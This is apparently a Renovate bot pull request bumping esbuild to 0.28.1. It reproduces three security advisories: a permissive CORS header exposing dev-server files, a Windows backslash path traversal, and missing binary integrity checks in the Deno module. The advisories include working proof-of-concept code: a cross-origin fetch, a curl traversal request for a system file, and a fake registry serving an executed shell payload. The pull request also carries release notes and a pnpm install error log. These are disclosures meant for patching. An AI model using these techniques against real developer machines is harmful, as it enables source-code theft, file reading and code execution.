Update dependency esbuild to v0.28.1 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
esbuild	0.28.0 → 0.28.1

---

esbuild enables any website to send any requests to the development server and read the response

GHSA-67mh-4wv8-2f99

More information

Details

Summary

esbuild allows any websites to send any request to the development server and read the response due to default CORS settings.

Details

esbuild sets Access-Control-Allow-Origin: * header to all requests, including the SSE connection, which allows any websites to send any request to the development server and read the response.

https://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L121
https://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L363

Attack scenario:

1. The attacker serves a malicious web page (http://malicious.example.com).
2. The user accesses the malicious web page.
3. The attacker sends a fetch('http://127.0.0.1:8000/main.js') request by JS in that malicious web page. This request is normally blocked by same-origin policy, but that's not the case for the reasons above.
4. The attacker gets the content of http://127.0.0.1:8000/main.js.

In this scenario, I assumed that the attacker knows the URL of the bundle output file name. But the attacker can also get that information by

• Fetching /index.html: normally you have a script tag here
• Fetching /assets: it's common to have a assets directory when you have JS files and CSS files in a different directory and the directory listing feature tells the attacker the list of files
• Connecting /esbuild SSE endpoint: the SSE endpoint sends the URL path of the changed files when the file is changed (new EventSource('/esbuild').addEventListener('change', e => console.log(e.type, e.data)))
• Fetching URLs in the known file: once the attacker knows one file, the attacker can know the URLs imported from that file

The scenario above fetches the compiled content, but if the victim has the source map option enabled, the attacker can also get the non-compiled content by fetching the source map file.

PoC

1. Download reproduction.zip
2. Extract it and move to that directory
3. Run npm i
4. Run npm run watch
5. Run fetch('http://127.0.0.1:8000/app.js').then(r => r.text()).then(content => console.log(content)) in a different website's dev tools.

Impact

Users using the serve feature may get the source code stolen by malicious websites.

Severity

• CVSS Score: 5.3 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

References

• https://github.com/evanw/esbuild/security/advisories/GHSA-67mh-4wv8-2f99
• https://github.com/evanw/esbuild/commit/de85afd65edec9ebc44a11e245fd9e9a2e99760d
• https://github.com/advisories/GHSA-67mh-4wv8-2f99

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

esbuild allows arbitrary file read when running the development server on Windows

GHSA-g7r4-m6w7-qqqr

More information

Details

Summary

The development server contains a path traversal vulnerability on Windows when serving files from servedir.

Due to the use of path.Clean() (which only normalizes forward-slash / separators) instead of a Windows-aware path normalization function, it is possible to craft requests using backslashes (\) that bypass the intended directory containment logic. An attacker can escape the configured servedir root and access arbitrary files on the filesystem.
This issue affects Windows environments only.

Details

The request path is sanitized using:

// https://github.com/evanw/esbuild/blob/v0.27.3/pkg/api/serve_other.go#L165
queryPath := path.Clean(req.URL.Path)[1:]

However:

• path.Clean() is POSIX-style and only understands / (docs: https://pkg.go.dev/path#Clean)
• On Windows, \ is a valid path separator
• path.Clean() does not treat \ as a separator

Later, the server constructs the absolute path:

// https://github.com/evanw/esbuild/blob/v0.27.3/pkg/api/serve_other.go#L221
absPath := h.fs.Join(h.servedir, queryPath)

If queryPath contains sequences such as:

..\..\..\..\..\..\..\Windows\system.ini

path.Clean() will not normalize them, but the Windows filesystem will interpret \ as directory separators when resolving absPath.
Because the implementation does not verify that the final resolved path remains within servedir, it allows directory traversal outside the intended root directory.

Vulnerable Code

// https://github.com/evanw/esbuild/blob/v0.27.3/pkg/api/serve_other.go#L165
	queryPath := path.Clean(req.URL.Path)[1:]
	....
	// Check for a file in the "servedir" directory
	if h.servedir != "" && kind != fs.FileEntry {
		absPath := h.fs.Join(h.servedir, queryPath)
		if absDir := h.fs.Dir(absPath); absDir != absPath {
			if entries, err, _ := h.fs.ReadDirectory(absDir); err == nil {
				if entry, _ := entries.Get(h.fs.Base(absPath)); entry != nil && entry.Kind(h.fs) == fs.FileEntry {
	....				

Steps to reproduce

npm install --save-exact --save-dev esbuild

echo "console.log(1)" > app.js

.\node_modules\.bin\esbuild --version
0.27.3

.\node_modules\.bin\esbuild app.js --bundle --outdir=www --servedir=www --watch

curl -i --path-as-is "http://localhost:8000/..\..\..\..\..\..\..\Windows\system.ini"
<content of Windows\system.ini>

Impact

• Arbitrary file read on Windows
• Exposure of sensitive files

Severity

• CVSS Score: 2.5 / 10 (Low)
• Vector String: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N

References

• https://github.com/evanw/esbuild/security/advisories/GHSA-g7r4-m6w7-qqqr
• https://github.com/evanw/esbuild/releases/tag/v0.28.1
• https://github.com/advisories/GHSA-g7r4-m6w7-qqqr

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

esbuild: Missing binary integrity verification in Deno module enables remote code execution via NPM_CONFIG_REGISTRY

GHSA-gv7w-rqvm-qjhr

More information

Details

Summary

The esbuild Deno module (lib/deno/mod.ts) downloads native binary executables from an npm registry and writes them to disk with executable permissions (0o755) without performing any integrity verification (e.g., SHA-256 hash check). The Node.js equivalent (lib/npm/node-install.ts) includes a robust binaryIntegrityCheck() function that verifies SHA-256 hashes against hardcoded expected values from package.json, but this protection was never implemented for the Deno distribution.

When the NPM_CONFIG_REGISTRY environment variable is set, the Deno module constructs a download URL using this attacker-influenced value and fetches a native binary from it. Because no integrity check is performed, an attacker who can control this environment variable (common in CI/CD pipelines, shared development environments, or corporate networks with custom npm registries) can supply a malicious binary that will be downloaded, written to disk, and executed with the privileges of the Deno process, achieving full remote code execution.

Details

Vulnerable code path — lib/deno/mod.ts lines 62–82:

async function installFromNPM(name: string, subpath: string): Promise<string> {
  const { finalPath, finalDir } = getCachePath(name)
  try { await Deno.stat(finalPath); return finalPath } catch (e) {}

  const npmRegistry = Deno.env.get("NPM_CONFIG_REGISTRY") || "https://registry.npmjs.org"  // line 70: attacker-controlled
  const url = `${npmRegistry}/${name}/-/${name.replace("@&#8203;esbuild/", "")}-${version}.tgz`     // line 71: URL uses attacker base
  const buffer = await fetch(url).then(r => r.arrayBuffer())                                  // line 72: download
  const executable = extractFileFromTarGzip(new Uint8Array(buffer), subpath)                   // line 73: extract

  await Deno.mkdir(finalDir, { recursive: true, mode: 0o700 })
  await Deno.writeFile(finalPath, executable, { mode: 0o755 })                                 // line 80: write + chmod
  return finalPath                                                                              // line 81: no hash check
}

Missing protection — The Node.js equivalent at lib/npm/node-install.ts lines 228–234:

function binaryIntegrityCheck(pkg: string, subpath: string, bytes: Uint8Array): void {
  const hash = crypto.createHash('sha256').update(bytes).digest('hex')
  const key = `${pkg}/${subpath}`
  const expected = packageJSON['esbuild.binaryHashes'][key]
  if (!expected) throw new Error(`Missing hash for "${key}"`)
  if (hash !== expected) throw new Error(...)
}

This function is called in both the installUsingNPM() path (line 131) and the downloadDirectlyFromNPM() path (line 243), but no equivalent exists in the Deno module. Searching the entire git history confirms binaryIntegrityCheck, binaryHashes, sha256, and hash have never appeared in lib/deno/mod.ts.

Execution flow after download: The binary returned by installFromNPM() is passed to spawn() at line 291 of the same file:

const child = spawn(binPath, { args: [`--service=${version}`], ... })

Attack vector: The NPM_CONFIG_REGISTRY environment variable is a standard npm configuration variable widely used in enterprise CI/CD pipelines to point to internal artifact repositories (Artifactory, Nexus, Verdaccio, etc.). An attacker who can inject or modify this variable in a build environment (e.g., via CI config injection, shared environment, or compromised registry) can redirect the download to a server they control and serve a trojaned native binary.

PoC

Prerequisites: Deno runtime, Node.js (for fake registry)

Step 1: Create a fake npm registry that serves a malicious binary:

// fake-registry.js
const http = require('http');
const zlib = require('zlib');
http.createServer((req, res) => {
  const fakeBin = '#!/bin/sh\necho PWNED > /tmp/deno-esbuild-rce-proof.txt\necho fake-esbuild-0.28.0\n';
  // ... build tar.gz with fake binary as package/bin/esbuild ...
  res.writeHead(200, {'Content-Length': gz.length});
  res.end(gz);
}).listen(19876, () => console.log('READY'));

Step 2: Run the PoC with NPM_CONFIG_REGISTRY pointing to the fake server:

// poc.ts — mimics lib/deno/mod.ts installFromNPM code path
const npmRegistry = Deno.env.get("NPM_CONFIG_REGISTRY") || "https://registry.npmjs.org";
const url = `${npmRegistry}/@​esbuild/linux-x64/-/linux-x64-0.28.0.tgz`;
const buffer = new Uint8Array(await (await fetch(url)).arrayBuffer());
// ... gzip decompress + tar extraction (same as extractFileFromTarGzip) ...
await Deno.writeFile("/tmp/downloaded-binary", executable, { mode: 0o755 });
// *** NO integrity check performed ***
const cmd = new Deno.Command("/tmp/downloaded-binary");
await cmd.output(); // RCE: executes attacker-controlled binary

Step 3: Run:

node fake-registry.js &
NPM_CONFIG_REGISTRY="http://127.0.0.1:19876" deno run --allow-all poc.ts
cat /tmp/deno-esbuild-rce-proof.txt  # Output: PWNED

Observed output in this environment:

Download URL: http://127.0.0.1:19876/@​esbuild/linux-x64/-/linux-x64-0.28.0.tgz
Binary written to: /tmp/deno-poc/downloaded-binary
Binary content: #!/bin/sh
echo PWNED > /tmp/deno-esbuild-rce-proof.txt
echo fake-esbuild-0.28.0

Executing downloaded binary...
stdout: fake-esbuild-0.28.0

*** RCE CONFIRMED ***
Marker file content: PWNED

Build-local verification — using the actual built deno/mod.js:

The esbuild Deno module was built from source (node scripts/esbuild.js ./esbuild --deno) producing deno/mod.js. The fake registry test was then re-run using the actual module via import * as esbuild from "file:///path/to/deno/mod.js", triggering the real installFromNPM() → installFromNPM() code path:

[TEST] esbuild Deno module loaded
[TEST] esbuild version: 0.28.0

[TEST] *** RCE VIA ACTUAL MODULE CONFIRMED ***
[TEST] Marker file content: VULN-CONFIRMED
[TEST] The actual built deno/mod.js downloaded and executed
[TEST] a malicious binary from the fake registry WITHOUT
[TEST] performing any SHA-256 integrity verification.

The malicious binary was cached at ~/.cache/esbuild/bin/@​esbuild-linux-x64@​0.28.0 with contents:

#!/bin/sh
echo "VULN-CONFIRMED" > /tmp/esbuild-deno-verify-rce.txt
echo "0.28.0"

Built-in Deno module (deno/mod.js) confirmed to contain NPM_CONFIG_REGISTRY usage (line 1900) and zero references to binaryIntegrityCheck, binaryHashes, sha256, or crypto.createHash.

Negative/control case — Node.js rejects the same fake binary:

Fake binary SHA-256: d85234b9bac94fcda135d112f0c23d9c31bbb14a5502a37e743a3cf2a3750fa1
Expected hash:       aafacdf135322bf47c882a4ea4db33d0375583f5b9c3fd2d4e12258e470568be
Hashes match: false
=> Node.js path REJECTS the fake binary (hash mismatch)
=> Deno path ACCEPTS it without any check

Impact

An attacker who can control the NPM_CONFIG_REGISTRY environment variable in a Deno project using esbuild can achieve arbitrary code execution with the privileges of the Deno process. This is particularly relevant in:

• CI/CD pipelines where NPM_CONFIG_REGISTRY is commonly set to point to internal artifact repositories
• Shared development environments where environment variables may be inherited from parent processes
• Corporate networks where npm registry mirrors are configured via this environment variable

The attacker does not need to compromise the npm registry itself — only the environment variable or network path between the Deno process and the registry.

Suggested remediation

1. Add SHA-256 integrity verification to the Deno module, mirroring the existing binaryIntegrityCheck() function from lib/npm/node-install.ts:

// In lib/deno/mod.ts, after extracting the binary:
const hashBuffer = await crypto.subtle.digest("SHA-256", executable);
const hash = Array.from(new Uint8Array(hashBuffer)).map(b => b.toString(16).padStart(2, '0')).join('');
const key = `${name}/${subpath}`;
const expected = EXPECTED_HASHES[key]; // Import from a shared hash manifest
if (hash !== expected) throw new Error(`Binary integrity check failed for "${key}"`);

2. Validate the NPM_CONFIG_REGISTRY URL to ensure it uses HTTPS (or at minimum warn about HTTP):

const npmRegistry = Deno.env.get("NPM_CONFIG_REGISTRY") || "https://registry.npmjs.org";
if (npmRegistry.startsWith("http://")) {
  console.warn(`[esbuild] Warning: NPM_CONFIG_REGISTRY uses insecure HTTP`);
}

3. Add ESBUILD_BINARY_PATH validation in the Deno module, mirroring the isValidBinaryPath() check from lib/npm/node-platform.ts.

Regression test suggestion: Add a test that verifies the Deno download path rejects a binary with a mismatched SHA-256 hash.

Severity

• CVSS Score: 8.1 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

References

• https://github.com/evanw/esbuild/security/advisories/GHSA-gv7w-rqvm-qjhr
• https://github.com/evanw/esbuild/releases/tag/v0.28.1
• https://github.com/advisories/GHSA-gv7w-rqvm-qjhr

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

evanw/esbuild (esbuild)

v0.28.1

Compare Source

• Disallow \\ in local development server HTTP requests (GHSA-g7r4-m6w7-qqqr)

  This release fixes a security issue where HTTP requests to esbuild's local development server could traverse outside of the serve directory on Windows using a \\ backslash character. It happened due to the use of Go's path.Clean() function, which only handles Unix-style / characters. HTTP requests with paths containing \\ are no longer allowed.

  Thanks to @​dellalibera for reporting this issue.

• Add integrity checks to the Deno API (GHSA-gv7w-rqvm-qjhr)

  The previous release of esbuild added integrity checks to esbuild's npm install script. This release also adds integrity checks to esbuild's Deno install script. Now esbuild's Deno API will also fail with an error if the downloaded esbuild binary contains something other than the expected content.

  Note that esbuild's Deno API installs from registry.npmjs.org by default, but allows the NPM_CONFIG_REGISTRY environment variable to override this with a custom package registry. This change means that the esbuild executable served by NPM_CONFIG_REGISTRY must now match the expected content.

  Thanks to @​sondt99 for reporting this issue.

• Avoid inlining using and await using declarations (#​4482)

  Previously esbuild's minifier sometimes incorrectly inlined using and await using declarations into subsequent uses of that declaration, which then fails to dispose of the resource correctly. This bug happened because inlining was done for let and const declarations by avoiding doing it for var declarations, which no longer worked when more declaration types were added. Here's an example:

  // Original code
  {
    using x = new Resource()
    x.activate()
  }
  
  // Old output (with --minify)
  new Resource().activate();
  
  // New output (with --minify)
  {using e=new Resource;e.activate()}

• Fix module evaluation when an error is thrown (#​4461, #​4467)

  If an error is thrown during module evaluation, esbuild previously didn't preserve the state of the module for subsequent module references. This was observable if import() or require() is used to import a module multiple times. The thrown error is supposed to be thrown by every call to import() or require(), not just the first. With this release, esbuild will now throw the same error every time you call import() or require() on a module that throws during its evaluation.

• Fix some edge cases around the new operator (#​4477)

  Previously esbuild incorrectly printed certain edge cases involving complex expressions inside the target of a new expression (specifically an optional chain and/or a tagged template literal). The generated code for the new target was not correctly wrapped with parentheses, and either contained a syntax error or had different semantics. These edge cases have been fixed so that they now correctly wrap the new target in parentheses. Here is an example of some affected code:

  // Original code
  new (foo()`bar`)()
  new (foo()?.bar)()
  
  // Old output
  new foo()`bar`();
  new (foo())?.bar();
  
  // New output
  new (foo())`bar`();
  new (foo()?.bar)();

• Fix renaming of nested var declarations (#​4471)

  This release fixes a bug where var declarations in nested scopes that are hoisted up to module scope were not correctly being renamed during bundling. That could previously lead to name collisions when minification was disabled, which could potentially cause a behavior change. The bug has been fixed so that these hoisted declarations are now considered to be module-level symbols during the name collision avoidance pass.

• Emit var instead of const for certain TypeScript-only constructs for ES5 (#​4448)

  While esbuild doesn't generally support converting const to var for ES5 due to nested scoping rules (which is currently a build-time error), esbuild previously incorrectly converted TypeScript-only import assignment constructs into a const declaration even when targeting ES5. With this release, esbuild will now use var for this case instead:

  // Original code
  import x = require('y')
  
  // Old output (with --target=es5)
  const x = require("y");
  
  // New output (with --target=es5)
  var x = require("y");

---

Configuration

📅 Schedule: (in timezone Australia/Sydney)

• Branch creation
  • At any time (no schedule defined)
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[renovate]

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

• any of the package files in this branch needs updating, or
• the branch becomes conflicted, or
• you click the rebase/retry checkbox if found above, or
• you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: pnpm-lock.yaml

Scope: all 87 workspace projects
? Verifying lockfile against supply-chain policies (2580 entries)...
[WARN] Request took 10007ms: https://registry.npmjs.org/@prisma%2Fmigrate
[WARN] Request took 12368ms: https://registry.npmjs.org/@prisma%2Fclient
✓ Lockfile passes supply-chain policies (2580 entries in 34.2s)
Progress: resolved 1, reused 0, downloaded 0, added 0
Progress: resolved 61, reused 0, downloaded 0, added 0
Progress: resolved 62, reused 0, downloaded 0, added 0
Progress: resolved 65, reused 0, downloaded 0, added 0
Progress: resolved 67, reused 0, downloaded 0, added 0
Progress: resolved 68, reused 0, downloaded 0, added 0
Progress: resolved 69, reused 0, downloaded 0, added 0
Progress: resolved 70, reused 0, downloaded 0, added 0
[WARN] Request took 11891ms: https://registry.npmjs.org/react
Progress: resolved 71, reused 0, downloaded 0, added 0
[WARN] Request took 12777ms: https://registry.npmjs.org/eslint-plugin-react-hooks
Progress: resolved 72, reused 0, downloaded 0, added 0
[WARN] Request took 15017ms: https://registry.npmjs.org/react-dom
Progress: resolved 73, reused 0, downloaded 0, added 0
Progress: resolved 74, reused 0, downloaded 0, added 0
Progress: resolved 75, reused 0, downloaded 0, added 0
Progress: resolved 76, reused 0, downloaded 0, added 0
Progress: resolved 79, reused 0, downloaded 0, added 0
Progress: resolved 80, reused 0, downloaded 0, added 0
Progress: resolved 83, reused 0, downloaded 0, added 0
Progress: resolved 84, reused 0, downloaded 0, added 0
Progress: resolved 85, reused 0, downloaded 0, added 0
Progress: resolved 86, reused 0, downloaded 0, added 0
Progress: resolved 87, reused 0, downloaded 0, added 0
Progress: resolved 88, reused 0, downloaded 0, added 0
[WARN] Request took 37668ms: https://registry.npmjs.org/next
Progress: resolved 92, reused 0, downloaded 0, added 0
Progress: resolved 93, reused 0, downloaded 0, added 0
Progress: resolved 94, reused 0, downloaded 0, added 0
Progress: resolved 96, reused 0, downloaded 0, added 0
Progress: resolved 97, reused 0, downloaded 0, added 0
examples/graphql-codegen                 | [WARN] deprecated eslint@8.57.1
Progress: resolved 102, reused 0, downloaded 0, added 0
Progress: resolved 106, reused 0, downloaded 0, added 0
Progress: resolved 110, reused 0, downloaded 0, added 0
Progress: resolved 111, reused 0, downloaded 0, added 0
Progress: resolved 112, reused 0, downloaded 0, added 0
Progress: resolved 113, reused 0, downloaded 0, added 0
Progress: resolved 114, reused 0, downloaded 0, added 0
Progress: resolved 115, reused 0, downloaded 0, added 0
Progress: resolved 116, reused 0, downloaded 0, added 0
Progress: resolved 117, reused 0, downloaded 0, added 0
packages/core                            | [WARN] deprecated @types/uuid@11.0.0
packages/core                            | [WARN] deprecated @apollo/server@4.13.0
Progress: resolved 135, reused 0, downloaded 0, added 0
Progress: resolved 146, reused 0, downloaded 0, added 0
packages/core                            | [WARN] deprecated intersection-observer@0.12.2
Progress: resolved 171, reused 0, downloaded 0, added 0
tests/admin-ui-tests                     | [WARN] deprecated treekill@1.0.0
Progress: resolved 191, reused 0, downloaded 0, added 0
Progress: resolved 192, reused 0, downloaded 0, added 0
tests/api-tests                          | [WARN] deprecated supertest@6.3.4
tests/api-tests                          | [WARN] deprecated uuid@9.0.1
Progress: resolved 201, reused 0, downloaded 0, added 0
Progress: resolved 202, reused 0, downloaded 0, added 0
Progress: resolved 206, reused 0, downloaded 0, added 0
[WARN] Request took 17588ms: https://registry.npmjs.org/playwright
Progress: resolved 207, reused 0, downloaded 0, added 0
Progress: resolved 208, reused 0, downloaded 0, added 0
Progress: resolved 442, reused 0, downloaded 0, added 0
Progress: resolved 491, reused 0, downloaded 0, added 0
Progress: resolved 529, reused 0, downloaded 0, added 0
Progress: resolved 585, reused 0, downloaded 0, added 0
Progress: resolved 652, reused 0, downloaded 0, added 0
Progress: resolved 664, reused 0, downloaded 0, added 0
Progress: resolved 674, reused 0, downloaded 0, added 0
Progress: resolved 683, reused 0, downloaded 0, added 0
Progress: resolved 809, reused 0, downloaded 0, added 0
Progress: resolved 855, reused 0, downloaded 0, added 0
Progress: resolved 883, reused 0, downloaded 0, added 0
Progress: resolved 912, reused 0, downloaded 0, added 0
Progress: resolved 935, reused 0, downloaded 0, added 0
Progress: resolved 943, reused 0, downloaded 0, added 0
Progress: resolved 969, reused 0, downloaded 0, added 0
Progress: resolved 974, reused 0, downloaded 0, added 0
Progress: resolved 976, reused 0, downloaded 0, added 0
Progress: resolved 994, reused 0, downloaded 0, added 0
Progress: resolved 1055, reused 0, downloaded 0, added 0
Progress: resolved 1085, reused 0, downloaded 0, added 0
[WARN] Request took 11129ms: https://registry.npmjs.org/react-refresh
Progress: resolved 1209, reused 0, downloaded 0, added 0
Progress: resolved 1215, reused 0, downloaded 0, added 0
Progress: resolved 1246, reused 0, downloaded 0, added 0
Progress: resolved 1317, reused 0, downloaded 0, added 0
Progress: resolved 1318, reused 0, downloaded 0, added 0
Progress: resolved 1319, reused 0, downloaded 0, added 0
Progress: resolved 1323, reused 0, downloaded 0, added 0
Progress: resolved 1328, reused 0, downloaded 0, added 0
Progress: resolved 1367, reused 0, downloaded 0, added 0
Progress: resolved 1500, reused 0, downloaded 0, added 0
Progress: resolved 1635, reused 0, downloaded 0, added 0
Progress: resolved 1656, reused 0, downloaded 0, added 0
[WARN] Request took 16853ms: https://registry.npmjs.org/playwright-core
Progress: resolved 1658, reused 0, downloaded 0, added 0
Progress: resolved 1667, reused 0, downloaded 0, added 0
Progress: resolved 1686, reused 0, downloaded 0, added 0
Progress: resolved 1705, reused 0, downloaded 0, added 0
Progress: resolved 1731, reused 0, downloaded 0, added 0
Progress: resolved 1741, reused 0, downloaded 0, added 0
Progress: resolved 1743, reused 0, downloaded 0, added 0
Progress: resolved 1750, reused 0, downloaded 0, added 0
Progress: resolved 1877, reused 0, downloaded 0, added 0
[WARN] Request took 14548ms: https://registry.npmjs.org/effect
Progress: resolved 1914, reused 0, downloaded 0, added 0
Progress: resolved 1945, reused 0, downloaded 0, added 0
Progress: resolved 1972, reused 0, downloaded 0, added 0
Progress: resolved 1973, reused 0, downloaded 0, added 0
Progress: resolved 1977, reused 0, downloaded 0, added 0
Progress: resolved 2000, reused 0, downloaded 0, added 0
Progress: resolved 2018, reused 0, downloaded 0, added 0
Progress: resolved 2103, reused 0, downloaded 0, added 0
Progress: resolved 2117, reused 0, downloaded 0, added 0
Progress: resolved 2121, reused 0, downloaded 0, added 0
Progress: resolved 2161, reused 0, downloaded 0, added 0
Progress: resolved 2196, reused 0, downloaded 0, added 0
Progress: resolved 2277, reused 0, downloaded 0, added 0
Progress: resolved 2360, reused 0, downloaded 0, added 0
Progress: resolved 2396, reused 0, downloaded 0, added 0
Progress: resolved 2573, reused 0, downloaded 0, added 0
Progress: resolved 2574, reused 0, downloaded 0, added 0
Progress: resolved 2575, reused 0, downloaded 0, added 0
Progress: resolved 2578, reused 0, downloaded 0, added 0
Progress: resolved 2592, reused 0, downloaded 0, added 0
Progress: resolved 2599, reused 0, downloaded 0, added 0
[ERR_PNPM_STRICT_MIN_RELEASE_AGE_REQUIRES_SAVE] minimumReleaseAgeStrict cannot be combined with --no-save: approval would require writing to minimumReleaseAgeExclude in pnpm-workspace.yaml, which --no-save prevents.

Drop --no-save so the exclude list can be persisted, or set minimumReleaseAgeStrict: false to let the install proceed without prompting (the lockfile would still trigger the auto-collect on the next normal install).